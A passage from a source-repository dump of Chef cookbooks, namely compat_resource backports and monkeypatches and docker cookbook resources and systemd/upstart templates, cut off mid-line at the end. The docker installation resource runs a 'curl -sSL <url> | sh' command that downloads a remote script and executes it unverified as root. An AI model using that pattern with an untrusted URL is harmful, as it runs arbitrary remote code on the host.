18 | 19 | - Update to 12.14.89 Chef 20 | - Fix autoload by applying fix from #106 21 | 22 | ## 12.14.6 (2016-09-20) 23 | 24 | - Update backported codebase to Chef 12.14.77 which brings in yum_repository updates and why-run enabled by default in custom resources 25 | 26 | ## 12.14.5 (2016-09-19) 27 | 28 | - Prevent spamming messages in Chefspec runs for cookbooks that depend on compat_resource 29 | 30 | ## 12.14.4 (2016-09-19) 31 | 32 | - Fix delayed notifications cloning 33 | 34 | ## 12.14.3 (2016-09-12) 35 | 36 | - Fix subscribes notifications 37 | 38 | ## 12.14.2 (2016-09-09) 39 | 40 | - Improve documentation 41 | - keep ChefCompat::Resource defined even if we don't load 42 | 43 | ## 12.14.1 (2016-09-07) 44 | 45 | - add yum_repository resource from Chef 12.14 46 | - Update the minimum chef version in the metadata to 12.1 47 | - Added maintainers files 48 | - suppress constant redef warnings when running chefspec 49 | -------------------------------------------------------------------------------- /chef/cookbooks/compat_resource/CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | Please refer to 2 | https://github.com/chef-cookbooks/community_cookbook_documentation/blob/master/CONTRIBUTING.MD 3 | -------------------------------------------------------------------------------- /chef/cookbooks/compat_resource/MAINTAINERS.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | # Maintainers 4 | 5 | This file lists how this cookbook project is maintained. When making changes to the system, this file tells you who needs to review your patch - you need a review from an existing maintainer for the cookbook to provide a :+1: on your pull request. Additionally, you need to not receive a veto from a Lieutenant or the Project Lead. 6 | 7 | Check out [How Cookbooks are Maintained](https://github.com/chef-cookbooks/community_cookbook_documentation/blob/master/CONTRIBUTING.MD) for details on the process and how to become a maintainer or the project lead. 8 | 9 | # Project Maintainer 10 | * [Lamont Granquist](https://github.com/lamont-granquist) 11 | 12 | # Maintainers 13 | * [Jennifer Davis](https://github.com/sigje) 14 | * [Tim Smith](https://github.com/tas50) 15 | * [Thom May](https://github.com/thommay) 16 | * [Lamont Granquist](https://github.com/lamont-granquist) 17 | -------------------------------------------------------------------------------- /chef/cookbooks/compat_resource/files/lib/chef_compat/copied_from_chef.rb: -------------------------------------------------------------------------------- 1 | module ChefCompat 2 | module CopiedFromChef 3 | def self.extend_chef_module(chef_module, target) 4 | target.instance_eval do 5 | include chef_module 6 | @chef_module = chef_module 7 | def self.method_missing(name, *args, &block) 8 | @chef_module.send(name, *args, &block) 9 | end 10 | def self.const_missing(name) 11 | @chef_module.const_get(name) 12 | end 13 | end 14 | end 15 | 16 | # This patch to CopiedFromChef's ActionClass is necessary for the include to work 17 | require 'chef/resource' 18 | class Chef < ::Chef 19 | class Resource < ::Chef::Resource 20 | module ActionClass 21 | def self.use_inline_resources 22 | end 23 | def self.include_resource_dsl(include_resource_dsl) 24 | end 25 | end 26 | end 27 | end 28 | end 29 | end 30 | -------------------------------------------------------------------------------- /chef/cookbooks/compat_resource/files/lib/chef_compat/copied_from_chef/chef/constants.rb: -------------------------------------------------------------------------------- 1 | # 2 | # NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE 3 | # 4 | # THIS IS A FILE AUTOGENERATED BY 'rake update' DO NOT EDIT!!!! 5 | # 6 | # NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE 7 | # 8 | 9 | begin 10 | require 'chef/constants' 11 | rescue LoadError; end 12 | 13 | require 'chef_compat/copied_from_chef' 14 | class Chef 15 | module ::ChefCompat 16 | module CopiedFromChef 17 | # 18 | # Author:: John Keiser 19 | # Copyright:: Copyright 2015-2016, Chef Software Inc. 20 | # License:: Apache License, Version 2.0 21 | # 22 | # Licensed under the Apache License, Version 2.0 (the "License"); 23 | # you may not use this file except in compliance with the License. 24 | # You may obtain a copy of the License at 25 | # 26 | # http://www.apache.org/licenses/LICENSE-2.0 27 | # 28 | # Unless required by applicable law or agreed to in writing, software 29 | # distributed under the License is distributed on an "AS IS" BASIS, 30 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 31 | # See the License for the specific language governing permissions and 32 | # limitations under the License. 33 | 34 | class Chef < (defined?(::Chef) ? ::Chef : Object) 35 | NOT_PASSED = Object.new 36 | def NOT_PASSED.to_s 37 | "NOT_PASSED" 38 | end 39 | 40 | def NOT_PASSED.inspect 41 | to_s 42 | end 43 | NOT_PASSED.freeze 44 | end 45 | end 46 | end 47 | end 48 | -------------------------------------------------------------------------------- /chef/cookbooks/compat_resource/files/lib/chef_compat/copied_from_chef/chef/delayed_evaluator.rb: -------------------------------------------------------------------------------- 1 | # 2 | # NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE 3 | # 4 | # THIS IS A FILE AUTOGENERATED BY 'rake update' DO NOT EDIT!!!! 5 | # 6 | # NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE 7 | # 8 | 9 | begin 10 | require 'chef/delayed_evaluator' 11 | rescue LoadError; end 12 | 13 | require 'chef_compat/copied_from_chef' 14 | class Chef 15 | module ::ChefCompat 16 | module CopiedFromChef 17 | # 18 | # Author:: John Keiser 19 | # Copyright:: Copyright 2015-2016, Chef Software Inc. 20 | # License:: Apache License, Version 2.0 21 | # 22 | # Licensed under the Apache License, Version 2.0 (the "License"); 23 | # you may not use this file except in compliance with the License. 24 | # You may obtain a copy of the License at 25 | # 26 | # http://www.apache.org/licenses/LICENSE-2.0 27 | # 28 | # Unless required by applicable law or agreed to in writing, software 29 | # distributed under the License is distributed on an "AS IS" BASIS, 30 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 31 | # See the License for the specific language governing permissions and 32 | # limitations under the License. 33 | 34 | class Chef < (defined?(::Chef) ? ::Chef : Object) 35 | class DelayedEvaluator < (defined?(::Chef::DelayedEvaluator) ? ::Chef::DelayedEvaluator : Proc) 36 | end 37 | end 38 | end 39 | end 40 | end 41 | -------------------------------------------------------------------------------- /chef/cookbooks/compat_resource/files/lib/chef_compat/copied_from_chef/chef/dsl/recipe.rb: -------------------------------------------------------------------------------- 1 | # 2 | # NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE 3 | # 4 | # THIS IS A FILE AUTOGENERATED BY 'rake update' DO NOT EDIT!!!! 5 | # 6 | # NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE 7 | # 8 | 9 | begin 10 | require 'chef/dsl/recipe' 11 | rescue LoadError; end 12 | 13 | require 'chef_compat/copied_from_chef' 14 | class Chef 15 | module ::ChefCompat 16 | module CopiedFromChef 17 | require "chef_compat/copied_from_chef/chef/dsl/core" 18 | require "chef_compat/copied_from_chef/chef/mixin/lazy_module_include" 19 | class Chef < (defined?(::Chef) ? ::Chef : Object) 20 | module DSL 21 | CopiedFromChef.extend_chef_module(::Chef::DSL, self) if defined?(::Chef::DSL) 22 | module Recipe 23 | CopiedFromChef.extend_chef_module(::Chef::DSL::Recipe, self) if defined?(::Chef::DSL::Recipe) 24 | include Chef::DSL::Core 25 | extend Chef::Mixin::LazyModuleInclude 26 | module FullDSL 27 | CopiedFromChef.extend_chef_module(::Chef::DSL::Recipe::FullDSL, self) if defined?(::Chef::DSL::Recipe::FullDSL) 28 | include Chef::DSL::Recipe 29 | extend Chef::Mixin::LazyModuleInclude 30 | end 31 | end 32 | end 33 | end 34 | require "chef_compat/copied_from_chef/chef/resource" 35 | end 36 | end 37 | end 38 | -------------------------------------------------------------------------------- /chef/cookbooks/compat_resource/files/lib/chef_compat/copied_from_chef/chef/resource/apt_update.rb: -------------------------------------------------------------------------------- 1 | # 2 | # NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE 3 | # 4 | # THIS IS A FILE AUTOGENERATED BY 'rake update' DO NOT EDIT!!!! 5 | # 6 | # NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE NOTICE 7 | # 8 | 9 | begin 10 | require 'chef/resource/apt_update' 11 | rescue LoadError; end 12 | 13 | require 'chef_compat/copied_from_chef' 14 | class Chef 15 | module ::ChefCompat 16 | module CopiedFromChef 17 | # 18 | # Author:: Thom May () 19 | # Copyright:: Copyright (c) 2016 Chef Software, Inc. 20 | # License:: Apache License, Version 2.0 21 | # 22 | # Licensed under the Apache License, Version 2.0 (the "License"); 23 | # you may not use this file except in compliance with the License. 24 | # You may obtain a copy of the License at 25 | # 26 | # http://www.apache.org/licenses/LICENSE-2.0 27 | # 28 | # Unless required by applicable law or agreed to in writing, software 29 | # distributed under the License is distributed on an "AS IS" BASIS, 30 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 31 | # See the License for the specific language governing permissions and 32 | # limitations under the License. 33 | # 34 | 35 | require "chef_compat/copied_from_chef/chef/resource" 36 | 37 | class Chef < (defined?(::Chef) ? ::Chef : Object) 38 | class Resource < (defined?(::Chef::Resource) ? ::Chef::Resource : Object) 39 | class AptUpdate < (defined?(::Chef::Resource::AptUpdate) ? ::Chef::Resource::AptUpdate : Chef::Resource) 40 | resource_name :apt_update 41 | provides :apt_update, os: "linux" 42 | 43 | property :frequency, Integer, default: 86_400 44 | 45 | default_action :periodic 46 | allowed_actions :update, :periodic 47 | end 48 | end 49 | end 50 | end 51 | end 52 | end 53 | -------------------------------------------------------------------------------- /chef/cookbooks/compat_resource/files/lib/chef_compat/mixin/properties.rb: -------------------------------------------------------------------------------- 1 | require 'chef_compat/monkeypatches' 2 | require 'chef_compat/copied_from_chef/chef/mixin/properties' 3 | 4 | module ChefCompat 5 | module Mixin 6 | Properties = ChefCompat::CopiedFromChef::Chef::Mixin::Properties 7 | end 8 | end 9 | -------------------------------------------------------------------------------- /chef/cookbooks/compat_resource/files/lib/chef_compat/monkeypatches/chef.rb: -------------------------------------------------------------------------------- 1 | class Chef 2 | NOT_PASSED = Object.new if !defined?(NOT_PASSED) 3 | # Earlier versions of Chef didn't have this message 4 | module ChefCompatDeprecation 5 | def log_deprecation(message, location=nil) 6 | if !location 7 | # Pick the first caller that is *not* part of the Chef or ChefCompat gem, 8 | # that's the thing the user wrote. 9 | chef_compat_gem_path = File.expand_path("../../..", __FILE__) 10 | chef_gem_path = File.expand_path("../..",::Chef::Resource.instance_method(:initialize).source_location[0]) 11 | caller(0..10).each do |c| 12 | if !c.start_with?(chef_gem_path) && !c.start_with?(chef_compat_gem_path) 13 | location = c 14 | break 15 | end 16 | end 17 | end 18 | 19 | begin 20 | super 21 | # Bleagh. `super_method` doesn't exist on older rubies and I haven't 22 | # figured out a way to check for its existence otherwise. 23 | rescue NoMethodError 24 | Chef::Log.warn(message) 25 | end 26 | end 27 | end 28 | 29 | class<= 12.5 && Chef::VERSION.to_f <= 12.8 2 | require 'chef/mixin/params_validate' 3 | class Chef 4 | module Mixin 5 | module ParamsValidate 6 | class SetOrReturnProperty < Chef::Property 7 | # 12.9 introduced a new optional parameter to `get()` to avoid a nil-set warning. 8 | # When their method gets called with 2 args, we need to ignore and call with 1. 9 | alias_method :_original_get2, :get 10 | def get(resource, *args) 11 | _original_get2(resource) 12 | end 13 | end 14 | end 15 | end 16 | end 17 | end 18 | -------------------------------------------------------------------------------- /chef/cookbooks/compat_resource/files/lib/chef_compat/monkeypatches/chef/node.rb: -------------------------------------------------------------------------------- 1 | class Chef 2 | class Node 3 | unless method_defined?(:set_cookbook_attribute) 4 | def set_cookbook_attribute 5 | # this implementation deliberately left blank - we don't need to do anything we just need to not fail 6 | end 7 | end 8 | end 9 | end 10 | -------------------------------------------------------------------------------- /chef/cookbooks/compat_resource/files/lib/chef_compat/monkeypatches/chef/property.rb: -------------------------------------------------------------------------------- 1 | # 12.9 introduced a new optional parameter to `get()` to avoid a nil-set warning. 2 | # We need to mimick it here. 3 | if Chef::VERSION.to_f >= 12.5 && Chef::VERSION.to_f <= 12.8 4 | require 'chef/property' 5 | class Chef 6 | class Property 7 | # 12.9 introduced a new optional parameter to `get()` to avoid a nil-set warning. 8 | # When their method gets called with 2 args, we need to ignore and call with 1. 9 | alias_method :_original_get, :get 10 | def get(resource, *args) 11 | _original_get(resource) 12 | end 13 | end 14 | end 15 | end 16 | -------------------------------------------------------------------------------- /chef/cookbooks/compat_resource/files/lib/chef_compat/monkeypatches/chef/recipe_hook.rb: -------------------------------------------------------------------------------- 1 | require 'chef/recipe' 2 | require 'chef_compat/recipe' 3 | 4 | class Chef::Recipe 5 | # If the cookbook depends on compat_resource, create a ChefCompat::Recipe object 6 | # instead of Chef::Recipe, for the extra goodies. 7 | def self.new(cookbook_name, recipe_name, run_context) 8 | if run_context && 9 | cookbook_name && 10 | recipe_name && 11 | run_context.cookbook_collection && 12 | run_context.cookbook_collection[cookbook_name] && 13 | run_context.cookbook_collection[cookbook_name].metadata.dependencies.has_key?('compat_resource') && 14 | self != ::ChefCompat::Recipe 15 | ::ChefCompat::Recipe.new(cookbook_name, recipe_name, run_context) 16 | else 17 | super 18 | end 19 | end 20 | end 21 | -------------------------------------------------------------------------------- /chef/cookbooks/compat_resource/files/lib/chef_compat/property.rb: -------------------------------------------------------------------------------- 1 | require 'chef_compat/copied_from_chef/chef/property' 2 | 3 | module ChefCompat 4 | class Property < ChefCompat::CopiedFromChef::Chef::Property 5 | end 6 | end 7 | -------------------------------------------------------------------------------- /chef/cookbooks/compat_resource/files/lib/chef_compat/recipe.rb: -------------------------------------------------------------------------------- 1 | require 'chef/recipe' 2 | require 'chef_compat/copied_from_chef/chef/dsl/recipe' 3 | 4 | module ChefCompat 5 | class Recipe < Chef::Recipe 6 | include ChefCompat::CopiedFromChef::Chef::DSL::Recipe::FullDSL 7 | end 8 | end 9 | -------------------------------------------------------------------------------- /chef/cookbooks/compat_resource/files/lib/chef_compat/resource/lwrp_base.rb: -------------------------------------------------------------------------------- 1 | require 'chef_compat/resource' 2 | require 'chef_compat/copied_from_chef/chef/resource' 3 | require 'chef/mixin/convert_to_class_name' 4 | require 'chef/mixin/from_file' 5 | 6 | module ChefCompat 7 | class Resource < ChefCompat::CopiedFromChef::Chef::Resource 8 | class LWRPBase < ChefCompat::Resource 9 | class<= 12.0").satisfied_by?(Gem::Version.new(Chef::VERSION)) 4 | 5 | require 'chef_compat/resource' 6 | require 'chef_compat/property' 7 | require 'chef_compat/mixin/properties' 8 | 9 | resources_dir = File.expand_path("chef_compat/copied_from_chef/chef/resource", File.dirname(__FILE__)) 10 | providers_dir = File.expand_path("chef_compat/copied_from_chef/chef/provider", File.dirname(__FILE__)) 11 | Dir["#{resources_dir}/*.rb"].each {|file| require file } 12 | Dir["#{providers_dir}/*.rb"].each {|file| require file } 13 | else 14 | 15 | class Chef 16 | class Resource 17 | def self.property(args, &block) 18 | raise_chef_11_error 19 | end 20 | 21 | def self.resource_name(args, &block) 22 | raise_chef_11_error 23 | end 24 | 25 | def self.action(args, &block) 26 | raise_chef_11_error 27 | end 28 | 29 | def self.raise_chef_11_error 30 | raise "This resource is written with Chef 12.5 custom resources, and requires at least Chef 12.0 used with the compat_resource cookbook, it will not work with Chef 11.x clients, and those users must pin their cookbooks to older versions or upgrade." 31 | end 32 | end 33 | end 34 | 35 | end 36 | -------------------------------------------------------------------------------- /chef/cookbooks/docker/CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | Please refer to 2 | https://github.com/chef-cookbooks/community_cookbook_documentation/blob/master/CONTRIBUTING.MD 3 | -------------------------------------------------------------------------------- /chef/cookbooks/docker/libraries/docker_exec.rb: -------------------------------------------------------------------------------- 1 | module DockerCookbook 2 | class DockerExec < DockerBase 3 | resource_name :docker_exec 4 | 5 | property :host, [String, nil], default: lazy { ENV['DOCKER_HOST'] }, desired_state: false 6 | property :command, Array 7 | property :container, String 8 | property :timeout, Numeric, default: 60, desired_state: false 9 | property :container_obj, Docker::Container, desired_state: false 10 | 11 | alias_method :cmd, :command 12 | 13 | action :run do 14 | converge_by "executing #{new_resource.command} on #{new_resource.container}" do 15 | with_retries { new_resource.container_obj Docker::Container.get(new_resource.container, {}, connection) } 16 | new_resource.container_obj.exec(new_resource.command, wait: new_resource.timeout) 17 | end 18 | end 19 | end 20 | end 21 | -------------------------------------------------------------------------------- /chef/cookbooks/docker/libraries/docker_image_prune.rb: -------------------------------------------------------------------------------- 1 | module DockerCookbook 2 | class DockerImagePrune < DockerBase 3 | resource_name :docker_image_prune 4 | # Requires docker API v1.25 5 | # Modify the default of read_timeout from 60 to 120 6 | property :read_timeout, default: 120, desired_state: false 7 | property :host, [String, nil], default: lazy { ENV['DOCKER_HOST'] }, desired_state: false 8 | 9 | # https://docs.docker.com/engine/api/v1.35/#operation/ImagePrune 10 | property :dangling, [TrueClass, FalseClass], default: true 11 | property :prune_until, String 12 | # https://docs.docker.com/engine/reference/builder/#label 13 | property :with_label, String 14 | property :without_label, String 15 | 16 | ######### 17 | # Actions 18 | ######### 19 | 20 | default_action :prune 21 | 22 | action :prune do 23 | # Have to call this method ourselves due to 24 | # https://github.com/swipely/docker-api/pull/507 25 | json = generate_json(new_resource) 26 | # Post 27 | res = connection.post('/images/prune', json) 28 | Chef::Log.info res 29 | end 30 | 31 | def generate_json(new_resource) 32 | opts = { filters: ["dangling=#{new_resource.dangling}"] } 33 | opts[:filters].push("until=#{new_resource.prune_until}") if new_resource.property_is_set?(:prune_until) 34 | opts[:filters].push("label=#{new_resource.with_label}") if new_resource.property_is_set?(:with_label) 35 | opts[:filters].push("label!=#{new_resource.without_label}") if new_resource.property_is_set?(:without_label) 36 | opts.to_json 37 | end 38 | end 39 | end 40 | -------------------------------------------------------------------------------- /chef/cookbooks/docker/libraries/docker_installation_script.rb: -------------------------------------------------------------------------------- 1 | module DockerCookbook 2 | class DockerInstallationScript < DockerBase 3 | resource_name :docker_installation_script 4 | 5 | provides :docker_installation, os: 'linux' 6 | 7 | property :repo, %w(main test experimental), default: 'main', desired_state: false 8 | property :script_url, String, default: lazy { default_script_url }, desired_state: false 9 | 10 | default_action :create 11 | 12 | ######################### 13 | # property helper methods 14 | ######################### 15 | 16 | def default_script_url 17 | case repo 18 | when 'main' 19 | 'https://get.docker.com/' 20 | when 'test' 21 | 'https://test.docker.com/' 22 | when 'experimental' 23 | 'https://experimental.docker.com/' 24 | end 25 | end 26 | 27 | ######### 28 | # Actions 29 | ######### 30 | 31 | action :create do 32 | package 'curl' 33 | 34 | execute 'install docker' do 35 | command "curl -sSL #{new_resource.script_url} | sh" 36 | creates '/usr/bin/docker' 37 | end 38 | end 39 | 40 | action :delete do 41 | package %w(docker-ce docker-engine) do 42 | action :remove 43 | end 44 | end 45 | end 46 | end 47 | -------------------------------------------------------------------------------- /chef/cookbooks/docker/libraries/docker_registry.rb: -------------------------------------------------------------------------------- 1 | module DockerCookbook 2 | class DockerRegistry < DockerBase 3 | resource_name :docker_registry 4 | 5 | property :email, String 6 | 7 | property :password, String, 8 | sensitive: true 9 | 10 | property :serveraddress, String, 11 | name_property: true 12 | 13 | property :username, String 14 | 15 | property :host, [String, nil], default: lazy { ENV['DOCKER_HOST'] }, desired_state: false 16 | 17 | action :login do 18 | tries = new_resource.api_retries 19 | 20 | registry_host = parse_registry_host(new_resource.serveraddress) 21 | 22 | (node.run_state['docker_auth'] ||= {})[registry_host] = { 23 | 'serveraddress' => registry_host, 24 | 'username' => new_resource.username, 25 | 'password' => new_resource.password, 26 | 'email' => new_resource.email, 27 | } 28 | 29 | begin 30 | Docker.connection.post( 31 | '/auth', {}, 32 | body: node.run_state['docker_auth'][registry_host].to_json 33 | ) 34 | rescue Docker::Error::ServerError, Docker::Error::UnauthorizedError 35 | raise Docker::Error::AuthenticationError, "#{new_resource.username} failed to authenticate with #{new_resource.serveraddress}" if (tries -= 1) == 0 36 | retry 37 | end 38 | 39 | true 40 | end 41 | end 42 | end 43 | -------------------------------------------------------------------------------- /chef/cookbooks/docker/libraries/docker_tag.rb: -------------------------------------------------------------------------------- 1 | module DockerCookbook 2 | class DockerTag < DockerBase 3 | resource_name :docker_tag 4 | 5 | property :target_repo, String, name_property: true 6 | property :target_tag, String 7 | property :to_repo, String 8 | property :to_tag, String 9 | property :force, [TrueClass, FalseClass], default: false, desired_state: false 10 | 11 | ######### 12 | # Actions 13 | ######### 14 | 15 | action :tag do 16 | return if new_resource.force == false && Docker::Image.exist?("#{new_resource.to_repo}:#{new_resource.to_tag}") 17 | begin 18 | converge_by "update #{new_resource.target_repo}:#{new_resource.target_tag} to #{new_resource.to_repo}:#{new_resource.to_tag}" do 19 | i = Docker::Image.get("#{new_resource.target_repo}:#{new_resource.target_tag}") 20 | i.tag('repo' => new_resource.to_repo, 'tag' => new_resource.to_tag, 'force' => new_resource.force) 21 | end 22 | rescue Docker::Error => e 23 | raise e.message 24 | end 25 | end 26 | end 27 | end 28 | -------------------------------------------------------------------------------- /chef/cookbooks/docker/libraries/docker_volume.rb: -------------------------------------------------------------------------------- 1 | module DockerCookbook 2 | class DockerVolume < DockerBase 3 | resource_name :docker_volume 4 | 5 | property :driver, String, desired_state: false 6 | property :host, [String, nil], default: lazy { ENV['DOCKER_HOST'] }, desired_state: false 7 | property :opts, Hash, desired_state: false 8 | property :volume, Docker::Volume, desired_state: false 9 | property :volume_name, String, name_property: true 10 | 11 | load_current_value do 12 | begin 13 | with_retries { volume Docker::Volume.get(volume_name, connection) } 14 | rescue Docker::Error::NotFoundError 15 | current_value_does_not_exist! 16 | end 17 | end 18 | 19 | action :create do 20 | converge_by "creating volume #{new_resource.volume_name}" do 21 | opts = {} 22 | opts['Driver'] = new_resource.driver if property_is_set?(:driver) 23 | opts['DriverOpts'] = new_resource.opts if property_is_set?(:opts) 24 | Docker::Volume.create(new_resource.volume_name, opts, connection) 25 | end if current_resource.nil? 26 | end 27 | 28 | action :remove do 29 | converge_by "removing volume #{new_resource.volume_name}" do 30 | current_resource.volume.remove 31 | end unless current_resource.nil? 32 | end 33 | end 34 | end 35 | -------------------------------------------------------------------------------- /chef/cookbooks/docker/metadata.json: -------------------------------------------------------------------------------- 1 | {"name":"docker","version":"4.9.3","description":"Provides docker_service, docker_image, and docker_container resources","long_description":"","maintainer":"Chef Software, Inc.","maintainer_email":"cookbooks@chef.io","license":"Apache-2.0","platforms":{"amazon":">= 0.0.0","centos":">= 0.0.0","scientific":">= 0.0.0","oracle":">= 0.0.0","debian":">= 0.0.0","fedora":">= 0.0.0","redhat":">= 0.0.0","ubuntu":">= 0.0.0"},"dependencies":{},"recommendations":{},"suggestions":{},"conflicting":{},"providing":{},"replacing":{},"attributes":{},"groupings":{},"recipes":{},"source_url":"https://github.com/chef-cookbooks/docker","issues_url":"https://github.com/chef-cookbooks/docker/issues","gems":[["docker-api","~> 1.34.0"]],"chef_version":[[">= 12.15"]],"ohai_version":[]} -------------------------------------------------------------------------------- /chef/cookbooks/docker/metadata.rb: -------------------------------------------------------------------------------- 1 | name 'docker' 2 | maintainer 'Chef Software, Inc.' 3 | maintainer_email 'cookbooks@chef.io' 4 | license 'Apache-2.0' 5 | description 'Provides docker_service, docker_image, and docker_container resources' 6 | version '4.9.3' 7 | 8 | source_url 'https://github.com/chef-cookbooks/docker' 9 | issues_url 'https://github.com/chef-cookbooks/docker/issues' 10 | 11 | supports 'amazon' 12 | supports 'centos' 13 | supports 'scientific' 14 | supports 'oracle' 15 | supports 'debian' 16 | supports 'fedora' 17 | supports 'redhat' 18 | supports 'ubuntu' 19 | 20 | chef_version '>= 12.15' 21 | gem 'docker-api', '~> 1.34.0' 22 | -------------------------------------------------------------------------------- /chef/cookbooks/docker/templates/default/default/docker-wait-ready.erb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | i=0 3 | while [ $i -lt <%= @service_timeout * 2 %> ]; do 4 | <%= @docker_cmd %> ps | head -n 1 | grep ^CONTAINER > /dev/null 2>&1 5 | [ $? -eq 0 ] && break 6 | ((i++)) 7 | sleep 0.5 8 | done 9 | [ $i -eq <%= @service_timeout * 2 %> ] && exit 1 10 | exit 0 11 | -------------------------------------------------------------------------------- /chef/cookbooks/docker/templates/default/default/docker.erb: -------------------------------------------------------------------------------- 1 | # Docker Upstart and SysVinit configuration file 2 | 3 | # If you need Docker to use an HTTP proxy, it can also be specified here. 4 | <% if @config.http_proxy %> 5 | export http_proxy="<%= @config.http_proxy %>" 6 | <% end %> 7 | <% if @config.https_proxy %> 8 | export https_proxy="<%= @config.https_proxy %>" 9 | <% end %> 10 | 11 | <% if @config.no_proxy %> 12 | export no_proxy="<%= @config.no_proxy %>" 13 | <% end %> 14 | 15 | # This is also a handy place to tweak where Docker's temporary files go. 16 | <% if @config.tmpdir %> 17 | export TMPDIR="<%= @config.tmpdir %>" 18 | <% end %> 19 | -------------------------------------------------------------------------------- /chef/cookbooks/docker/templates/default/sysconfig/docker.erb: -------------------------------------------------------------------------------- 1 | # /etc/sysconfig/docker 2 | 3 | # If you need Docker to use an HTTP proxy, it can also be specified here. 4 | <% if @config.http_proxy %> 5 | export http_proxy="<%= @config.http_proxy %>" 6 | <% end %> 7 | <% if @config.https_proxy %> 8 | export https_proxy="<%= @config.https_proxy %>" 9 | <% end %> 10 | 11 | <% if @config.no_proxy %> 12 | export no_proxy="<%= @config.no_proxy %>" 13 | <% end %> 14 | -------------------------------------------------------------------------------- /chef/cookbooks/docker/templates/default/systemd/docker.service-override.erb: -------------------------------------------------------------------------------- 1 | [Unit] 2 | Description=Docker Application Container Engine 3 | Documentation=https://docs.docker.com 4 | <% if @docker_socket.nil? %> 5 | After=network-online.target firewalld.service 6 | <% else %> 7 | After=network-online.target <%= @docker_name %>.socket firewalld.service 8 | Requires=<%= @docker_name %>.socket 9 | <% end %> 10 | Wants=network-online.target 11 | 12 | [Service] 13 | Type=notify 14 | <% if @config.http_proxy %> 15 | Environment="HTTP_PROXY=<%= @config.http_proxy %>" 16 | <% end %> 17 | <% if @config.https_proxy %> 18 | Environment="HTTPS_PROXY=<%= @config.https_proxy %>" 19 | <% end %> 20 | <% if @config.no_proxy %> 21 | Environment="NO_PROXY=<%= @config.no_proxy %>" 22 | <% end %> 23 | <% if @config.tmpdir %> 24 | Environment="TMPDIR=<%= @config.tmpdir %>" 25 | <% end %> 26 | <% @env_vars.each do |key, val| %> 27 | Environment="<%= key %>=<%= val %>" 28 | <% end unless @env_vars.nil? %> 29 | <% if @config.ipv4_forward %> 30 | ExecStartPre=/sbin/sysctl -w net.ipv4.ip_forward=1 31 | <% end %> 32 | <% if @config.ipv6_forward %> 33 | ExecStartPre=/sbin/sysctl -w net.ipv6.conf.all.forwarding=1 34 | <% end %> 35 | ExecStart=<%= @docker_daemon_cmd %> 36 | ExecStartPost=<%= @docker_wait_ready %> 37 | ExecReload=/bin/kill -s HUP $MAINPID 38 | <% if @config.mount_flags %> 39 | MountFlags=<%= @config.mount_flags %> 40 | <% end %> 41 | LimitNOFILE=1048576 42 | LimitNPROC=infinity 43 | LimitCORE=infinity 44 | TasksMax=infinity 45 | TimeoutStartSec=0 46 | Delegate=yes 47 | KillMode=process 48 | Restart=always 49 | StartLimitBurst=3 50 | StartLimitInterval=60s 51 | <%= @systemd_args %> 52 | 53 | [Install] 54 | WantedBy=multi-user.target 55 | -------------------------------------------------------------------------------- /chef/cookbooks/docker/templates/default/systemd/docker.service.erb: -------------------------------------------------------------------------------- 1 | [Unit] 2 | Description=Docker Application Container Engine 3 | Documentation=https://docs.docker.com 4 | <% if @docker_socket.nil? %> 5 | After=network-online.target firewalld.service 6 | <% else %> 7 | After=network-online.target <%= @docker_name %>.socket firewalld.service 8 | Requires=<%= @docker_name %>.socket 9 | <% end %> 10 | Wants=network-online.target 11 | 12 | [Service] 13 | Type=notify 14 | # the default is not to use systemd for cgroups because the delegate issues still 15 | # exists and systemd currently does not support the cgroup feature set required 16 | # for containers run by docker 17 | ExecStart=/usr/bin/dockerd -H fd:// 18 | ExecReload=/bin/kill -s HUP $MAINPID 19 | LimitNOFILE=1048576 20 | # Having non-zero Limit*s causes performance problems due to accounting overhead 21 | # in the kernel. We recommend using cgroups to do container-local accounting. 22 | LimitNPROC=infinity 23 | LimitCORE=infinity 24 | # Uncomment TasksMax if your systemd version supports it. 25 | # Only systemd 226 and above support this version. 26 | TasksMax=infinity 27 | TimeoutStartSec=0 28 | # set delegate yes so that systemd does not reset the cgroups of docker containers 29 | Delegate=yes 30 | # kill only the docker process, not all processes in the cgroup 31 | KillMode=process 32 | # restart the docker process if it exits prematurely 33 | Restart=on-failure 34 | StartLimitBurst=3 35 | StartLimitInterval=60s 36 | 37 | [Install] 38 | WantedBy=multi-user.target 39 | -------------------------------------------------------------------------------- /chef/cookbooks/docker/templates/default/systemd/docker.socket-override.erb: -------------------------------------------------------------------------------- 1 | [Unit] 2 | Description=Docker Socket for the API 3 | PartOf=<%= @docker_name %>.service 4 | 5 | [Socket] 6 | ListenStream=<%= @docker_socket %> 7 | SocketGroup=<%= @config.group %> 8 | <%= @systemd_socket_args %> 9 | 10 | [Install] 11 | WantedBy=sockets.target 12 | -------------------------------------------------------------------------------- /chef/cookbooks/docker/templates/default/systemd/docker.socket.erb: -------------------------------------------------------------------------------- 1 | [Unit] 2 | Description=Docker Socket for the API 3 | PartOf=<%= @docker_name %>.service 4 | 5 | [Socket] 6 | ListenStream=<%= @docker_socket %> 7 | SocketMode=0660 8 | SocketUser=root 9 | SocketGroup=<%= @config.group %> 10 | 11 | [Install] 12 | WantedBy=sockets.target 13 | -------------------------------------------------------------------------------- /chef/cookbooks/docker/templates/default/systemd/tmpfiles.d.conf.erb: -------------------------------------------------------------------------------- 1 | d /var/run/docker 0755 root <%= @config.group || 'root' %> - 2 | -------------------------------------------------------------------------------- /chef/cookbooks/docker/templates/default/upstart/docker.conf.erb: -------------------------------------------------------------------------------- 1 | description "Docker daemon" 2 | 3 | start on (filesystem and net-device-up 